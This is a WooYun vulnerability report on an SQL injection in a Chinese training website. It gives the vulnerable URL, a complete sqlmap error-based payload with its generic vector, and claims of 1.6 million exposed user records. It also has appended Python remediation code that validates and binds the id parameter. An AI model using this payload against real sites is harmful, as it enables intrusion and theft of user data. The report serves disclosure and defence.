Vulnerability summary

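Bug ID: wooyun-2015-0156801

Title: SQL injection vulnerability in 技成培训网 (involving 1.6 million users' data)

Vendor: 技成培训网

Author: 路人甲

Submitted: 2015-11-29 22:31

Fix time: 2016-01-13 22:32

Disclosed: 2016-01-13 22:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org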


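Vulnerability details

Disclosure status:

2015-11-29: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-01-13: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection vulnerability

Detailed description:

See the proof of vulnerability

Proof of vulnerability: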

http://www.jcpeixun.com/ask/detail.aspx?id=242771



13 databases exposed


Database: jcpeixun
Table: pre_common_member
1.6 million users' records exposed


Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=242771' AND (SELECT 8558 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,(SELECT (ELT(8558=8558,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rRTW'='rRTW
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30319
back-end DBMS: MySQL 5.0

Remediation:

Filter the input.
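
Added example (not part of the original report and not the vendor's code): the remediation above names only filtering; one way to apply it to the numeric id parameter is strict allow-list validation followed by a bound query parameter. Python with sqlite3 stands in here for the site's ASP.NET/MySQL stack, and the table name ask_question and all function names are hypothetical.

```python
import re
import sqlite3

# Value of the `id` parameter quoted from the sqlmap output above, used as test input.
PAGE_PAYLOAD = (
    "242771' AND (SELECT 8558 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,"
    "(SELECT (ELT(8558=8558,1))),0x7170707071,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rRTW'='rRTW"
)

_ID_RE = re.compile(r"[0-9]{1,10}")  # ASCII digits only, bounded length


def parse_question_id(raw):
    """Allow-list validation: accept only a short run of ASCII digits."""
    if not isinstance(raw, str) or not _ID_RE.fullmatch(raw):
        raise ValueError("id must be a positive integer")
    return int(raw)


def make_demo_db():
    """Constructed in-memory table standing in for the real question table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ask_question (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO ask_question VALUES (242771, 'constructed sample row')")
    return conn


def get_question(conn, raw_id):
    """Hardened lookup: validate the type first, then bind the value."""
    try:
        qid = parse_question_id(raw_id)
    except ValueError:
        return None  # the handler maps this to 400/404 and never echoes DB errors
    cur = conn.execute("SELECT id, title FROM ask_question WHERE id = ?", (qid,))
    return cur.fetchone()


def lookup_bound_only(conn, raw_id):
    """Binding alone: the raw string is compared as data, never parsed as SQL."""
    cur = conn.execute("SELECT id, title FROM ask_question WHERE id = ?", (raw_id,))
    return cur.fetchone()


if __name__ == "__main__":
    db = make_demo_db()
    print(get_question(db, "242771"))
    print(get_question(db, PAGE_PAYLOAD))
    print(lookup_bound_only(db, PAGE_PAYLOAD))
```

The validation layer rejects the reported payload before any query runs, and the bound parameter keeps it inert even if validation is skipped; returning a generic error page instead of the database error also removes the channel an error-based technique depends on.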

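Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively refused

Vulnerability Rank: 15 (WooYun rating)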